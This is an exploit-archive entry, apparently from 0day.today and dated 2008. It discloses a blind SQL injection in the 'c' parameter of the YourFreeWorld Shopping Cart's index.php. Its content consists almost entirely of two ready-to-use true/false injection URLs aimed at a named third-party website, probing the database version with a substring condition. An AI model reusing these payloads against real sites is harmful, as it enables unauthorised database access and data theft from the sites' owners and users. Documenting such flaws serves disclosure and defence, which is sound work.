id: 4032
date: 11/02/2008
title: YourFreeWorld Shopping Cart (index.php c) Blind SQL Injection Vuln
author: Hussin X
cves: 

==================================================================
YourFreeWorld Shopping Cart (index.php c) Blind SQL Injection Vuln
==================================================================



Shopping Cart ( index.php c )  Blind SQL Injection Vulnerability
___________________________________

Author: Hussin X
___________________________________

script    :http://www.yourfreeworld.com/script/affiliateshoppingcart.php

Demo :
_______
true & false

http://www.downlinegoldmine.com/shopcart/index.php?c=12+and+substring(@@version,1,1)=4
http://www.downlinegoldmine.com/shopcart/index.php?c=12+and+substring(@@version,1,1)=5




#  0day.today [2023-03-22]  #